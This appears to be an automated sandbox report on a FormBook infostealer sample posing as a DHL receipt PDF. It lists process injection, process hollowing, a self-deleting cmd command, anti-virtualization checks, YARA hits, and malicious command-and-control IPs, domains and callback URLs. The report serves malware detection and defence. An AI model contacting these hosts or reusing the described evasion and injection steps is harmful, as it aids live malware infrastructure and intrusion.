Source: C:\Users\user\Desktop\DHL_29028263 receipt document of the purchase,pdf.exe Process created: C:\Windows\SysWOW64\find.exe C:\Windows\SysWOW64\find.exe Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Windows\SysWOW64\find.exe" Jump to behavior
Source: explorer.exe, 00000004.00000000.512312703.0000000006100000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.558816370.0000000007EFB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.534654530.0000000007EF6000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000004.00000000.476501179.0000000000E38000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.506649925.0000000001430000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000004.00000000.524723252.0000000000E38000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Progman
Source: explorer.exe, 00000004.00000000.506649925.0000000001430000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000004.00000000.525999583.0000000001430000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000004.00000000.477060567.0000000001430000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: YProgram Managerf
Source: explorer.exe, 00000004.00000000.506649925.0000000001430000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000004.00000000.525999583.0000000001430000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000004.00000000.477060567.0000000001430000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progmanlock
Queries the volume information (name, serial number etc) of a device
Source: C:\Users\user\Desktop\DHL_29028263 receipt document of the purchase,pdf.exe Queries volume information: C:\Users\user\Desktop\DHL_29028263 receipt document of the purchase,pdf.exe VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\DHL_29028263 receipt document of the purchase,pdf.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\DHL_29028263 receipt document of the purchase,pdf.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior
AV process strings found (often used to terminate AV products)
Source: DHL_29028263 receipt document of the purchase,pdf.exe, 00000000.00000002.484850602.0000000002E3D000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: procdump.exe
Source: DHL_29028263 receipt document of the purchase,pdf.exe, 00000000.00000002.484850602.0000000002E3D000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Nm C:\Windows\SysWOW64\procdump.exe

Stealing of Sensitive Information
barindex
Yara detected FormBook
Source: Yara match File source: 2.2.find.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.0.find.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.0.find.exe.400000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.0.find.exe.400000.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.2.find.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.0.find.exe.400000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.0.find.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.0.find.exe.400000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.0.find.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000000.00000002.490164346.00000000048A4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000000.527619880.0000000005187000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000000.471183159.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.571277848.0000000000D40000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.705413123.0000000003210000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.487275778.0000000004472000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.704496254.00000000029D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.487559942.00000000044F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000000.508992436.0000000005187000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000000.470820106.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.705527409.0000000003240000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.570977775.0000000000D10000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000000.470421147.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.570002580.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY

Remote Access Functionality
barindex
Yara detected FormBook
Source: Yara match File source: 2.2.find.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.0.find.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.0.find.exe.400000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.0.find.exe.400000.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.2.find.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.0.find.exe.400000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.0.find.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.0.find.exe.400000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.0.find.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000000.00000002.490164346.00000000048A4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000000.527619880.0000000005187000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000000.471183159.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.571277848.0000000000D40000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.705413123.0000000003210000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.487275778.0000000004472000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.704496254.00000000029D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.487559942.00000000044F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000000.508992436.0000000005187000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000000.470820106.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.705527409.0000000003240000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.570977775.0000000000D10000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000000.470421147.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.570002580.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 635250 Sample: DHL_29028263 receipt docume... Startdate: 27/05/2022 Architecture: WINDOWS Score: 100 33 www.commercewholesale.com 2->33 35 www.corporatesupplygroup.online 2->35 43 Snort IDS alert for network traffic 2->43 45 Multi AV Scanner detection for domain / URL 2->45 47 Found malware configuration 2->47 49 12 other signatures 2->49 11 DHL_29028263 receipt document of the purchase,pdf.exe 1 2->11         started        signatures3 process4 file5 31 DHL_29028263 recei...urchase,pdf.exe.log, ASCII 11->31 dropped 59 Writes to foreign memory regions 11->59 61 Allocates memory in foreign processes 11->61 63 Injects a PE file into a foreign processes 11->63 15 find.exe 11->15         started        18 tcmsetup.exe 11->18         started        signatures6 process7 signatures8 65 Modifies the context of a thread in another process (thread injection) 15->65 67 Maps a DLL or memory area into another process 15->67 69 Sample uses process hollowing technique 15->69 71 2 other signatures 15->71 20 explorer.exe 15->20 injected process9 dnsIp10 37 www.946abg.net 154.86.129.243, 49798, 80 DXTL-HKDXTLTseungKwanOServiceHK Seychelles 20->37 39 cherylwoya.com 64.34.156.161, 49797, 80 COGECO-PEER1CA Canada 20->39 41 2 other IPs or domains 20->41 51 System process connects to network (likely due to code injection or exploit) 20->51 24 svchost.exe 20->24         started        signatures11 process12 signatures13 53 Modifies the context of a thread in another process (thread injection) 24->53 55 Maps a DLL or memory area into another process 24->55 57 Tries to detect virtualization through RDTSC time measurements 24->57 27 cmd.exe 1 24->27         started        process14 process15 29 conhost.exe 27->29         started       
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
64.34.156.161
 cherylwoya.com Canada
13768 COGECO-PEER1CA true
154.86.129.243
 www.946abg.net Seychelles
134548 DXTL-HKDXTLTseungKwanOServiceHK true

Contacted Domains

Name IP Active
www.commercewholesale.com 209.99.64.43 true
cherylwoya.com 64.34.156.161 true
www.946abg.net 154.86.129.243 true
www.corporatesupplygroup.online 203.170.80.250 true
www.cherylwoya.com unknown unknown
www.kyousaku.net unknown unknown

Contacted URLs

Name Malicious Antivirus Detection Reputation
http://www.cherylwoya.com/mrw6/?5j=-Z8hhJu0CH1&kZL=6fZEMEdK0EUsHT8poDGbU1zs+0N96qjYHzalTR2tuqMjY7ixAH4WqcSwjImDfJQ+xirU true
  • Avira URL Cloud: phishing
 unknown
http://www.946abg.net/mrw6/?kZL=serf4G2fT23AQqvD11FW0e5UhnaipW+P1SIFRHWKX7vOHQGiYIAk+83ijhEv+8S8z0gu&5j=-Z8hhJu0CH1 true
  • Avira URL Cloud: malware
 unknown
www.bestofsouthbeach.guide/mrw6/ true
  • Avira URL Cloud: malware
 low